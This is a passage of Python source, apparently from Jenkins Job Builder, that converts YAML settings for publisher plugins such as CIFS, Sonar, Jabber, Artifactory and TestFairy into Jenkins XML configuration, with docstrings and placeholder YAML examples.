transfersset = XML.SubElement(transfers, transferset_tag)
XML.SubElement(transfersset, 'remoteDirectory').text = data['target']
XML.SubElement(transfersset, 'sourceFiles').text = data['source']
if 'command' in data:
XML.SubElement(transfersset, 'execCommand').text = data['command']
if 'timeout' in data:
XML.SubElement(transfersset, 'execTimeout').text = str(data['timeout'])
if 'use-pty' in data:
XML.SubElement(transfersset, 'usePty').text = \
str(data.get('use-pty', False)).lower()
XML.SubElement(transfersset, 'excludes').text = data.get('excludes', '')
XML.SubElement(transfersset, 'removePrefix').text = \
data.get('remove-prefix', '')
XML.SubElement(transfersset, 'remoteDirectorySDF').text = \
str(data.get('target-is-date-format', False)).lower()
XML.SubElement(transfersset, 'flatten').text = \
str(data.get('flatten', False)).lower()
XML.SubElement(transfersset, 'cleanRemote').text = \
str(data.get('clean-remote', False)).lower()
XML.SubElement(inner, 'useWorkspaceInPromotion').text = 'false'
XML.SubElement(inner, 'usePromotionTimestamp').text = 'false'
XML.SubElement(delegate, 'continueOnError').text = 'false'
XML.SubElement(delegate, 'failOnError').text = \
str(data.get('fail-on-error', False)).lower()
XML.SubElement(delegate, 'alwaysPublishFromMaster').text = \
str(data.get('always-publish-from-master', False)).lower()
XML.SubElement(delegate, 'hostConfigurationAccess',
{'class': reference_plugin_tag,
'reference': '../..'})
return (outer, transfersset)
def cifs(parser, xml_parent, data):
"""yaml: cifs
Upload files via CIFS.
Requires the Jenkins :jenkins-wiki:`Publish over CIFS Plugin
<Publish+Over+CIFS+Plugin>`.
:arg str site: name of the cifs site/share
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
:arg bool flatten: only create files on the server, don't create
directories (default false).
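
    A short illustrative snippet (the share name and paths below are
    placeholders):

    .. code-block:: yaml

        publishers:
          - cifs:
              site: 'cifs-share'
              target: 'dest/dir'
              source: 'base/source/dir/**'
              remove-prefix: 'base/source/dir'
              excludes: '**/*.excludedfiletype'
              flatten: true
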
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cifs001.yaml
:language: yaml
"""
console_prefix = 'CIFS: '
plugin_tag = 'jenkins.plugins.publish__over__cifs.CifsPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__cifs.CifsPublisher'
transfer_tag = 'jenkins.plugins.publish__over__cifs.CifsTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_cifs.' \
'CifsPublisherPlugin'
base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
def cigame(parser, xml_parent, data):
"""yaml: cigame
This plugin introduces a game where users get points
for improving the builds.
Requires the Jenkins :jenkins-wiki:`The Continuous Integration Game plugin
<The+Continuous+Integration+Game+plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cigame.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.cigame.GamePublisher')
def sonar(parser, xml_parent, data):
"""yaml: sonar
Sonar plugin support.
Requires the Jenkins `Sonar Plugin.
<http://docs.sonarqube.org/display/SONAR/\
Analyzing+with+SonarQube+Scanner+for+Jenkins>`_
    :arg str installation-name: name of the Sonar instance to use (optional)
:arg str jdk: JDK to use (inherited from the job if omitted). (optional)
:arg str branch: branch onto which the analysis will be posted (optional)
:arg str language: source code language (optional)
:arg str root-pom: Root POM (default 'pom.xml')
:arg bool private-maven-repo: If true, use private Maven repository.
(default false)
:arg str maven-installation-name: name of the Maven installation to use
(optional)
:arg str maven-opts: options given to maven (optional)
:arg str additional-properties: sonar analysis parameters (optional)
:arg dict skip-global-triggers:
:Triggers: * **skip-when-scm-change** (`bool`): skip analysis when
build triggered by scm
* **skip-when-upstream-build** (`bool`): skip analysis when
build triggered by an upstream build
* **skip-when-envvar-defined** (`str`): skip analysis when
the specified environment variable is set to true
:arg str settings: Path to use as user settings.xml. It is possible to
provide a ConfigFileProvider settings file, see Example below. (optional)
:arg str global-settings: Path to use as global settings.xml. It is
possible to provide a ConfigFileProvider settings file, see Example
below. (optional)
Requires the Jenkins :jenkins-wiki:`Config File Provider Plugin
<Config+File+Provider+Plugin>`
for the Config File Provider "settings" and "global-settings" config.
This publisher supports the post-build action exposed by the Jenkins
Sonar Plugin, which is triggering a Sonar Analysis with Maven.
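
    A short illustrative snippet (the instance name, branch and properties
    below are placeholders):

    .. code-block:: yaml

        publishers:
          - sonar:
              installation-name: 'sonarqube'
              branch: 'feature/my-branch'
              language: 'java'
              root-pom: 'pom.xml'
              private-maven-repo: true
              maven-opts: '-DskipTests'
              additional-properties: '-Dsonar.verbose=true'
              skip-global-triggers:
                skip-when-scm-change: true
                skip-when-upstream-build: true
                skip-when-envvar-defined: SKIP_SONAR
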
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sonar001.yaml
:language: yaml
"""
sonar = XML.SubElement(xml_parent, 'hudson.plugins.sonar.SonarPublisher')
if 'installation-name' in data:
XML.SubElement(sonar, 'installationName').text = data[
'installation-name']
if 'jdk' in data:
XML.SubElement(sonar, 'jdk').text = data['jdk']
XML.SubElement(sonar, 'branch').text = data.get('branch', '')
XML.SubElement(sonar, 'language').text = data.get('language', '')
XML.SubElement(sonar, 'rootPom').text = data.get('root-pom', 'pom.xml')
XML.SubElement(sonar, 'usePrivateRepository').text = str(
data.get('private-maven-repo', False)).lower()
if 'maven-installation-name' in data:
XML.SubElement(sonar, 'mavenInstallationName').text = data[
'maven-installation-name']
XML.SubElement(sonar, 'mavenOpts').text = data.get('maven-opts', '')
XML.SubElement(sonar, 'jobAdditionalProperties').text = \
data.get('additional-properties', '')
if 'skip-global-triggers' in data:
data_triggers = data['skip-global-triggers']
triggers = XML.SubElement(sonar, 'triggers')
XML.SubElement(triggers, 'skipScmCause').text = \
str(data_triggers.get('skip-when-scm-change', False)).lower()
XML.SubElement(triggers, 'skipUpstreamCause').text = \
str(data_triggers.get('skip-when-upstream-build', False)).lower()
XML.SubElement(triggers, 'envVar').text = \
data_triggers.get('skip-when-envvar-defined', '')
helpers.config_file_provider_settings(sonar, data)
def performance(parser, xml_parent, data):
"""yaml: performance
Publish performance test results from jmeter and junit.
Requires the Jenkins :jenkins-wiki:`Performance Plugin
<Performance+Plugin>`.
    :arg int failed-threshold: Specify the error percentage threshold that
        marks the build as failed. A negative value means this threshold is
        not used (default 0)
    :arg int unstable-threshold: Specify the error percentage threshold that
        marks the build as unstable. A negative value means this threshold is
        not used (default 0)
:arg dict report:
:(jmeter or junit): (`dict` or `str`): Specify a custom report file
(optional; jmeter default \**/*.jtl, junit default **/TEST-\*.xml)
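
    A short illustrative snippet (the thresholds and report path below are
    placeholders; a plain string entry uses the parser's default glob):

    .. code-block:: yaml

        publishers:
          - performance:
              failed-threshold: 85
              unstable-threshold: -1
              report:
                - jmeter: '**/special/*.jtl'
                - junit
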
Examples:
.. literalinclude:: /../../tests/publishers/fixtures/performance001.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/performance002.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/performance003.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
perf = XML.SubElement(xml_parent, 'hudson.plugins.performance.'
'PerformancePublisher')
XML.SubElement(perf, 'errorFailedThreshold').text = str(data.get(
'failed-threshold', 0))
XML.SubElement(perf, 'errorUnstableThreshold').text = str(data.get(
'unstable-threshold', 0))
parsers = XML.SubElement(perf, 'parsers')
for item in data['report']:
if isinstance(item, dict):
item_name = next(iter(item.keys()))
item_values = item.get(item_name, None)
if item_name == 'jmeter':
jmhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JMeterParser')
XML.SubElement(jmhold, 'glob').text = str(item_values)
elif item_name == 'junit':
juhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JUnitParser')
XML.SubElement(juhold, 'glob').text = str(item_values)
else:
logger.fatal("You have not specified jmeter or junit, or "
"you have incorrectly assigned the key value.")
sys.exit(1)
elif isinstance(item, str):
if item == 'jmeter':
jmhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JMeterParser')
XML.SubElement(jmhold, 'glob').text = '**/*.jtl'
elif item == 'junit':
juhold = XML.SubElement(parsers, 'hudson.plugins.performance.'
'JUnitParser')
XML.SubElement(juhold, 'glob').text = '**/TEST-*.xml'
else:
logger.fatal("You have not specified jmeter or junit, or "
"you have incorrectly assigned the key value.")
sys.exit(1)
def join_trigger(parser, xml_parent, data):
"""yaml: join-trigger
Trigger a job after all the immediate downstream jobs have completed
:arg bool even-if-unstable: if true jobs will trigger even if some
downstream jobs are marked as unstable (default false)
:arg list projects: list of projects to trigger
:arg list publishers: list of triggers from publishers module that
defines projects that need to be triggered
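
    A short illustrative snippet (the project names below are placeholders):

    .. code-block:: yaml

        publishers:
          - join-trigger:
              even-if-unstable: true
              projects:
                - cleanup-job
                - report-job
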
Example:
.. literalinclude:: /../../tests/publishers/fixtures/join-trigger001.yaml
:language: yaml
"""
jointrigger = XML.SubElement(xml_parent, 'join.JoinTrigger')
joinProjectsText = ','.join(data.get('projects', ['']))
XML.SubElement(jointrigger, 'joinProjects').text = joinProjectsText
publishers = XML.SubElement(jointrigger, 'joinPublishers')
for pub in data.get('publishers', []):
for edited_node in create_publishers(parser, pub):
publishers.append(edited_node)
unstable = str(data.get('even-if-unstable', 'false')).lower()
XML.SubElement(jointrigger, 'evenIfDownstreamUnstable').text = unstable
def jabber(parser, xml_parent, data):
"""yaml: jabber
Integrates Jenkins with the Jabber/XMPP instant messaging protocol
Requires the Jenkins :jenkins-wiki:`Jabber Plugin <Jabber+Plugin>`.
:arg bool notify-on-build-start: Whether to send notifications
to channels when a build starts (default false)
:arg bool notify-scm-committers: Whether to send notifications
to the users that are suspected of having broken this build
(default false)
:arg bool notify-scm-culprits: Also send notifications to 'culprits'
from previous unstable/failed builds (default false)
:arg bool notify-upstream-committers: Whether to send notifications to
upstream committers if no committers were found for a broken build
(default false)
:arg bool notify-scm-fixers: Whether to send notifications to the users
that have fixed a broken build (default false)
:arg list group-targets: List of group targets to notify
:arg list individual-targets: List of individual targets to notify
:arg dict strategy: When to send notifications (default all)
:strategy values:
* **all** -- Always
* **failure** -- On any failure
* **failure-fixed** -- On failure and fixes
* **change** -- Only on state change
:arg dict message: Channel notification message (default summary-scm)
:message values:
* **summary-scm** -- Summary + SCM changes
* **summary** -- Just summary
* **summary-build** -- Summary and build parameters
* **summary-scm-fail** -- Summary, SCM changes, and failed tests
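
    A short illustrative snippet (the targets below are placeholders):

    .. code-block:: yaml

        publishers:
          - jabber:
              notify-on-build-start: true
              group-targets:
                - 'build-room@conference.example.com'
              individual-targets:
                - 'developer@example.com'
              strategy: failure-fixed
              message: summary-scm
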
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jabber001.yaml
:language: yaml
"""
j = XML.SubElement(xml_parent, 'hudson.plugins.jabber.im.transport.'
'JabberPublisher')
t = XML.SubElement(j, 'targets')
if 'group-targets' in data:
for group in data['group-targets']:
gcimt = XML.SubElement(t, 'hudson.plugins.im.'
'GroupChatIMMessageTarget')
XML.SubElement(gcimt, 'name').text = group
XML.SubElement(gcimt, 'notificationOnly').text = 'false'
if 'individual-targets' in data:
for individual in data['individual-targets']:
dimt = XML.SubElement(t, 'hudson.plugins.im.'
'DefaultIMMessageTarget')
XML.SubElement(dimt, 'value').text = individual
strategy = data.get('strategy', 'all')
strategydict = {'all': 'ALL',
'failure': 'ANY_FAILURE',
'failure-fixed': 'FAILURE_AND_FIXED',
'change': 'STATECHANGE_ONLY'}
if strategy not in strategydict:
raise JenkinsJobsException("Strategy entered is not valid, must be " +
"one of: all, failure, failure-fixed, or "
"change")
XML.SubElement(j, 'strategy').text = strategydict[strategy]
XML.SubElement(j, 'notifyOnBuildStart').text = str(
data.get('notify-on-build-start', False)).lower()
XML.SubElement(j, 'notifySuspects').text = str(
data.get('notify-scm-committers', False)).lower()
XML.SubElement(j, 'notifyCulprits').text = str(
data.get('notify-scm-culprits', False)).lower()
XML.SubElement(j, 'notifyFixers').text = str(
data.get('notify-scm-fixers', False)).lower()
XML.SubElement(j, 'notifyUpstreamCommitters').text = str(
data.get('notify-upstream-committers', False)).lower()
message = data.get('message', 'summary-scm')
messagedict = {'summary-scm': 'DefaultBuildToChatNotifier',
'summary': 'SummaryOnlyBuildToChatNotifier',
'summary-build': 'BuildParametersBuildToChatNotifier',
'summary-scm-fail': 'PrintFailingTestsBuildToChatNotifier'}
if message not in messagedict:
raise JenkinsJobsException("Message entered is not valid, must be one "
"of: summary-scm, summary, summary-build "
"or summary-scm-fail")
XML.SubElement(j, 'buildToChatNotifier', {
'class': 'hudson.plugins.im.build_notify.' + messagedict[message]})
XML.SubElement(j, 'matrixMultiplier').text = 'ONLY_CONFIGURATIONS'
def workspace_cleanup(parser, xml_parent, data):
"""yaml: workspace-cleanup (post-build)
Requires the Jenkins :jenkins-wiki:`Workspace Cleanup Plugin
<Workspace+Cleanup+Plugin>`.
The pre-build workspace-cleanup is available as a wrapper.
:arg list include: list of files to be included
:arg list exclude: list of files to be excluded
:arg bool dirmatch: Apply pattern to directories too (default false)
:arg list clean-if: clean depending on build status
:clean-if values:
* **success** (`bool`) (default true)
* **unstable** (`bool`) (default true)
* **failure** (`bool`) (default true)
* **aborted** (`bool`) (default true)
* **not-built** (`bool`) (default true)
:arg bool fail-build: Fail the build if the cleanup fails (default true)
:arg bool clean-parent: Cleanup matrix parent workspace (default false)
:arg str external-deletion-command: external deletion command to run
against files and directories
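
    A short illustrative snippet (the patterns below are placeholders):

    .. code-block:: yaml

        publishers:
          - workspace-cleanup:
              include:
                - '*.zip'
              exclude:
                - '.git/**'
              dirmatch: true
              clean-if:
                - success: true
                - failure: false
              fail-build: false
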
Example:
.. literalinclude::
/../../tests/publishers/fixtures/workspace-cleanup001.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent,
'hudson.plugins.ws__cleanup.WsCleanup')
p.set("plugin", "ws-cleanup")
if "include" in data or "exclude" in data:
patterns = XML.SubElement(p, 'patterns')
for inc in data.get("include", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
XML.SubElement(ptrn, 'pattern').text = inc
XML.SubElement(ptrn, 'type').text = "INCLUDE"
for exc in data.get("exclude", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
XML.SubElement(ptrn, 'pattern').text = exc
XML.SubElement(ptrn, 'type').text = "EXCLUDE"
XML.SubElement(p, 'deleteDirs').text = \
str(data.get("dirmatch", False)).lower()
XML.SubElement(p, 'cleanupMatrixParent').text = \
str(data.get("clean-parent", False)).lower()
XML.SubElement(p, 'externalDelete').text = \
str(data.get('external-deletion-command', ''))
mask = [('success', 'cleanWhenSuccess'),
('unstable', 'cleanWhenUnstable'),
('failure', 'cleanWhenFailure'),
('not-built', 'cleanWhenNotBuilt'),
('aborted', 'cleanWhenAborted')]
clean = data.get('clean-if', [])
cdict = dict()
for d in clean:
cdict.update(d)
for k, v in mask:
XML.SubElement(p, v).text = str(cdict.pop(k, True)).lower()
if len(cdict) > 0:
        raise ValueError('clean-if must be one of: %r' % [k for k, _ in mask])
if str(data.get("fail-build", False)).lower() == 'false':
XML.SubElement(p, 'notFailBuild').text = 'true'
else:
XML.SubElement(p, 'notFailBuild').text = 'false'
def maven_deploy(parser, xml_parent, data):
"""yaml: maven-deploy
Deploy artifacts to Maven repository.
:arg str id: Repository ID
:arg str url: Repository URL (optional)
:arg bool unique-version: Assign unique versions to snapshots
(default true)
:arg bool deploy-unstable: Deploy even if the build is unstable
(default false)
:arg str release-env-var: If the given variable name is set to "true",
the deploy steps are skipped. (optional)
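
    A short illustrative snippet (the repository id and url below are
    placeholders):

    .. code-block:: yaml

        publishers:
          - maven-deploy:
              id: 'internal-releases'
              url: 'https://repo.example.com/releases'
              unique-version: true
              deploy-unstable: false
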
Example:
.. literalinclude:: /../../tests/publishers/fixtures/maven-deploy001.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent, 'hudson.maven.RedeployPublisher')
if 'id' in data:
XML.SubElement(p, 'id').text = data['id']
if 'url' in data:
XML.SubElement(p, 'url').text = data['url']
XML.SubElement(p, 'uniqueVersion').text = str(
data.get('unique-version', True)).lower()
XML.SubElement(p, 'evenIfUnstable').text = str(
data.get('deploy-unstable', False)).lower()
if 'release-env-var' in data:
XML.SubElement(p, 'releaseEnvVar').text = data['release-env-var']
def artifactory(parser, xml_parent, data):
"""yaml: artifactory
    Deploy artifacts to an Artifactory server.
Requires the Jenkins :jenkins-wiki:`Artifactory Plugin
<Artifactory+Plugin>`.
:arg str url: Artifactory server url (default '')
    :arg str name: Artifactory user with permissions to deploy to the
        selected Artifactory server (default '')
:arg str release-repo-key: Release repository name (default '')
:arg str snapshot-repo-key: Snapshots repository name (default '')
:arg bool publish-build-info: Push build metadata with artifacts
(default false)
:arg bool discard-old-builds:
Remove older build info from Artifactory (default false)
:arg bool discard-build-artifacts:
Remove older build artifacts from Artifactory (default false)
:arg bool even-if-unstable: Deploy artifacts even when the build
is unstable (default false)
:arg bool run-checks: Run automatic license scanning check after the
build is complete (default false)
:arg bool include-publish-artifacts: Include the build's published
module artifacts in the license violation checks if they are
also used as dependencies for other modules in this build
(default false)
:arg bool pass-identified-downstream: When true, a build parameter
named ARTIFACTORY_BUILD_ROOT with a value of
${JOB_NAME}-${BUILD_NUMBER} will be sent to downstream builds
(default false)
:arg bool license-auto-discovery: Tells Artifactory not to try
and automatically analyze and tag the build's dependencies
with license information upon deployment (default true)
:arg bool enable-issue-tracker-integration: When the Jenkins
JIRA plugin is enabled, synchronize information about JIRA
issues to Artifactory and attach issue information to build
artifacts (default false)
:arg bool aggregate-build-issues: When the Jenkins JIRA plugin
is enabled, include all issues from previous builds up to the
latest build status defined in "Aggregation Build Status"
(default false)
:arg bool allow-promotion-of-non-staged-builds: The build
promotion operation will be available to all successful builds
instead of only staged ones (default false)
:arg bool filter-excluded-artifacts-from-build: Add the excluded
files to the excludedArtifacts list and remove them from the
artifacts list in the build info (default false)
:arg str scopes: A list of dependency scopes/configurations to run
license violation checks on. If left empty all dependencies from
all scopes will be checked (default '')
:arg str violation-recipients: Recipients that need to be notified
of license violations in the build info (default '')
:arg list matrix-params: Semicolon-separated list of properties to
attach to all deployed artifacts in addition to the default ones:
build.name, build.number, and vcs.revision (default [])
:arg str black-duck-app-name: The existing Black Duck Code Center
application name (default '')
:arg str black-duck-app-version: The existing Black Duck Code Center
application version (default '')
:arg str black-duck-report-recipients: Recipients that will be emailed
a report after the automatic Black Duck Code Center compliance checks
finished (default '')
:arg str black-duck-scopes: A list of dependency scopes/configurations
to run Black Duck Code Center compliance checks on. If left empty
all dependencies from all scopes will be checked (default '')
:arg bool black-duck-run-checks: Automatic Black Duck Code Center
compliance checks will occur after the build completes
(default false)
:arg bool black-duck-include-published-artifacts: Include the build's
published module artifacts in the license violation checks if they
are also used as dependencies for other modules in this build
(default false)
:arg bool auto-create-missing-component-requests: Auto create
missing components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool auto-discard-stale-component-requests: Auto discard
stale components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool deploy-artifacts: Push artifacts to the Artifactory
Server. Use deployment-include-patterns and
deployment-exclude-patterns to filter deploy artifacts. (default true)
:arg list deployment-include-patterns: New line or comma separated mappings
of build artifacts to published artifacts. Supports Ant-style wildcards
mapping to target directories. E.g.: */*.zip=>dir (default [])
:arg list deployment-exclude-patterns: New line or comma separated patterns
for excluding artifacts from deployment to Artifactory (default [])
:arg bool env-vars-include: Include all environment variables
accessible by the build process. Jenkins-specific env variables
are always included. Use env-vars-include-patterns and
env-vars-exclude-patterns to filter variables to publish,
(default false)
:arg list env-vars-include-patterns: Comma or space-separated list of
environment variables that will be included as part of the published
build info. Environment variables may contain the * and the ? wildcards
(default [])
:arg list env-vars-exclude-patterns: Comma or space-separated list of
environment variables that will be excluded from the published
build info (default [])
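
    A short illustrative snippet covering only a few of the options above
    (the server url, user and repository names below are placeholders):

    .. code-block:: yaml

        publishers:
          - artifactory:
              url: 'https://artifactory.example.com/artifactory'
              name: 'ci-user'
              release-repo-key: 'libs-release-local'
              snapshot-repo-key: 'libs-snapshot-local'
              publish-build-info: true
              deploy-artifacts: true
              deployment-include-patterns:
                - '**/*.jar=>libs'
              env-vars-include: true
              env-vars-include-patterns:
                - 'PROJECT_*'
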
Example:
.. literalinclude:: /../../tests/publishers/fixtures/artifactory01.yaml
.. literalinclude:: /../../tests/publishers/fixtures/artifactory02.yaml
"""
artifactory = XML.SubElement(
xml_parent, 'org.jfrog.hudson.ArtifactoryRedeployPublisher')
# optional_props
helpers.artifactory_optional_props(artifactory, data, 'publishers')
XML.SubElement(artifactory, 'matrixParams').text = ','.join(
data.get('matrix-params', []))
# details
details = XML.SubElement(artifactory, 'details')
helpers.artifactory_common_details(details, data)
XML.SubElement(details, 'repositoryKey').text = data.get(
'release-repo-key', '')
XML.SubElement(details, 'snapshotsRepositoryKey').text = data.get(
'snapshot-repo-key', '')
plugin = XML.SubElement(details, 'stagingPlugin')
XML.SubElement(plugin, 'pluginName').text = 'None'
# artifactDeploymentPatterns
helpers.artifactory_deployment_patterns(artifactory, data)
# envVarsPatterns
helpers.artifactory_env_vars_patterns(artifactory, data)
def test_fairy(parser, xml_parent, data):
"""yaml: test-fairy
This plugin helps you to upload Android APKs or iOS IPA files to
www.testfairy.com.
Requires the Jenkins :jenkins-wiki:`Test Fairy Plugin
<TestFairy+Plugin>`.
:arg str platform: Select platform to upload to, **android** or **ios**
(required)
Android Only:
:arg str proguard-file: Path to Proguard file. Path of mapping.txt from
your proguard output directory. (default '')
:arg str storepass: Password for the keystore (default android)
:arg str alias: alias for key (default androiddebugkey)
:arg str keypass: password for the key (default '')
:arg str keystorepath: Path to Keystore file (required)
IOS Only:
:arg str dSYM-file: Path to .dSYM.zip file (default '')
All:
:arg str apikey: TestFairy API_KEY. Find it in your TestFairy account
settings (required)
:arg str appfile: Path to App file (.apk) or (.ipa). For example:
$WORKSPACE/[YOUR_FILE_NAME].apk or full path to the apk file.
(required)
:arg str tester-groups: Tester groups to notify (default '')
:arg bool notify-testers: Send email with changelogs to testers
(default false)
:arg bool autoupdate: Automatic update (default false)
:arg str max-duration: Duration of the session (default 10m)
:arg bool record-on-background: Record on background (default false)
:arg bool data-only-wifi: Record data only in wifi (default false)
:arg bool video-enabled: Record video (default true)
:arg str screenshot-interval: Time interval between screenshots
(default 1)
:arg str video-quality: Video quality (default high)
:arg bool cpu: Enable CPU metrics (default true)
:arg bool memory: Enable memory metrics (default true)
:arg bool logs: Enable logs metrics (default true)
:arg bool network: Enable network metrics (default false)
:arg bool phone-signal: Enable phone signal metrics (default false)
:arg bool wifi: Enable wifi metrics (default false)
:arg bool gps: Enable gps metrics (default false)
:arg bool battery: Enable battery metrics (default false)
:arg bool opengl: Enable opengl metrics (default false)
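
    A short illustrative snippet for an Android upload (the API key, file
    paths and keystore values below are placeholders):

    .. code-block:: yaml

        publishers:
          - test-fairy:
              platform: android
              apikey: 'YOUR_TESTFAIRY_API_KEY'
              appfile: '$WORKSPACE/app/build/outputs/apk/app-debug.apk'
              keystorepath: '/var/lib/jenkins/debug.keystore'
              storepass: android
              alias: androiddebugkey
              tester-groups: 'qa'
              notify-testers: true
              video-enabled: true
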
Example:
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-android-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-android001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-ios-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-ios001.yaml
:language: yaml
"""
platform = data.get('platform')
valid_platforms = ['android', 'ios']
if 'platform' not in data:
raise MissingAttributeError('platform')
if platform == 'android':
root = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.testfairy.TestFairyAndroidRecorder')
helpers.test_fairy_common(root, data)
mappings = [
('proguard-file', 'mappingFile', ''),
('keystorepath', 'keystorePath', None),
('storepass', 'storepass', 'android'),
('alias', 'alias', 'androiddebugkey'),
('keypass', 'keypass', '')]
helpers.convert_mapping_to_xml(
root, data, mappings, fail_required=True)
elif platform == 'ios':
root = XML.SubElement(
xml_parent, 'org.jenkinsci.plugins.testfairy.TestFairyIosRecorder')
helpers.test_fairy_common(root, data)
mappings = [('dSYM-file', 'mappingFile', '')]
helpers.convert_mapping_to_xml(
root, data, mappings, fail_required=True)
else:
raise InvalidAttributeError('platform', platform, valid_platforms)
def text_finder(parser, xml_parent, data):
"""yaml: text-finder
This plugin lets you search keywords in the files you specified and
additionally check build status
Requires the Jenkins :jenkins-wiki:`Text-finder Plugin
<Text-finder+Plugin>`.
:arg str regexp: Specify a regular expression
:arg str fileset: Specify the path to search
:arg bool also-check-console-output:
Search the console output (default false)
:arg bool succeed-if-found:
Force a build to succeed if a string was found (default false)
:arg bool unstable-if-found:
Set build unstable instead of failing the build (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/text-finder001.yaml
:language: yaml
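As an inline illustration (the regexp and fileset values are placeholders):

.. code-block:: yaml

    publishers:
      - text-finder:
          regexp: 'MY CUSTOM ERROR MARKER'
          fileset: 'logs/**/*.log'
          also-check-console-output: true
          unstable-if-found: true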
"""
finder = XML.SubElement(xml_parent,
'hudson.plugins.textfinder.TextFinderPublisher')
if 'fileset' in data:
XML.SubElement(finder, 'fileSet').text = data['fileset']
XML.SubElement(finder, 'regexp').text = data['regexp']
check_output = str(data.get('also-check-console-output', False)).lower()
XML.SubElement(finder, 'alsoCheckConsoleOutput').text = check_output
succeed_if_found = str(data.get('succeed-if-found', False)).lower()
XML.SubElement(finder, 'succeedIfFound').text = succeed_if_found
unstable_if_found = str(data.get('unstable-if-found', False)).lower()
XML.SubElement(finder, 'unstableIfFound').text = unstable_if_found
def html_publisher(parser, xml_parent, data):
"""yaml: html-publisher
This plugin publishes HTML reports.
Requires the Jenkins :jenkins-wiki:`HTML Publisher Plugin
<HTML+Publisher+Plugin>`.
:arg str name: Report name
:arg str dir: HTML directory to archive
:arg str files: Specify the pages to display
:arg bool keep-all: keep HTML reports for each past build (default false)
:arg bool allow-missing: Allow missing HTML reports (default false)
:arg bool link-to-last-build: If this and 'keep-all' both are true, it
publishes the link on project level even if build failed.
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/html-publisher001.yaml
:language: yaml
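An illustrative snippet (report name and paths are placeholders):

.. code-block:: yaml

    publishers:
      - html-publisher:
          name: 'Coverage Report'
          dir: 'coverage/html'
          files: 'index.html'
          keep-all: true
          allow-missing: false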
"""
reporter = XML.SubElement(xml_parent, 'htmlpublisher.HtmlPublisher')
targets = XML.SubElement(reporter, 'reportTargets')
ptarget = XML.SubElement(targets, 'htmlpublisher.HtmlPublisherTarget')
XML.SubElement(ptarget, 'reportName').text = data['name']
XML.SubElement(ptarget, 'reportDir').text = data['dir']
XML.SubElement(ptarget, 'reportFiles').text = data['files']
XML.SubElement(ptarget, 'alwaysLinkToLastBuild').text = str(
data.get('link-to-last-build', False)).lower()
keep_all = str(data.get('keep-all', False)).lower()
XML.SubElement(ptarget, 'keepAll').text = keep_all
allow_missing = str(data.get('allow-missing', False)).lower()
XML.SubElement(ptarget, 'allowMissing').text = allow_missing
XML.SubElement(ptarget, 'wrapperName').text = "htmlpublisher-wrapper.html"
def rich_text_publisher(parser, xml_parent, data):
"""yaml: rich-text-publisher
This plugin puts custom rich text message to the Build pages and Job main
page.
Requires the Jenkins :jenkins-wiki:`Rich Text Publisher Plugin
<Rich+Text+Publisher+Plugin>`.
:arg str stable-text: The stable text
:arg str unstable-text: The unstable text if different from stable
(default '')
:arg str failed-text: The failed text if different from stable (default '')
:arg str parser-name: HTML, Confluence or WikiText
Example:
.. literalinclude:: /../../tests/publishers/fixtures/richtext001.yaml
:language: yaml
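A minimal illustrative snippet (the message texts are placeholders):

.. code-block:: yaml

    publishers:
      - rich-text-publisher:
          stable-text: 'Build succeeded'
          failed-text: 'Build failed, see console log'
          parser-name: HTML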
"""
parsers = ['HTML', 'Confluence', 'WikiText']
parser_name = data['parser-name']
if parser_name not in parsers:
raise JenkinsJobsException('parser-name must be one of: %s' %
", ".join(parsers))
reporter = XML.SubElement(
xml_parent,
'org.korosoft.jenkins.plugin.rtp.RichTextPublisher')
XML.SubElement(reporter, 'stableText').text = data['stable-text']
XML.SubElement(reporter, 'unstableText').text =\
data.get('unstable-text', '')
XML.SubElement(reporter, 'failedText').text = data.get('failed-text', '')
XML.SubElement(reporter, 'unstableAsStable').text =\
'False' if data.get('unstable-text', '') else 'True'
XML.SubElement(reporter, 'failedAsStable').text =\
'False' if data.get('failed-text', '') else 'True'
XML.SubElement(reporter, 'parserName').text = parser_name
def tap(parser, xml_parent, data):
"""yaml: tap
Adds support to TAP test result files
Requires the Jenkins :jenkins-wiki:`TAP Plugin <TAP+Plugin>`.
:arg str results: TAP test result files (required)
:arg bool fail-if-no-results: Fail if no result (default false)
:arg bool failed-tests-mark-build-as-failure:
Mark build as failure if test fails (default false)
:arg bool output-tap-to-console: Output tap to console (default true)
:arg bool enable-subtests: Enable subtests (default true)
:arg bool discard-old-reports: Discard old reports (default false)
:arg bool todo-is-failure: Handle TODOs as failures (default true)
:arg bool include-comment-diagnostics: Include comment diagnostics (#) in
the results table (>=1.12) (default false)
:arg bool validate-tests: Validate number of tests (>=1.13) (default false)
:arg bool plan-required: TAP plan required? (>=1.17) (default true)
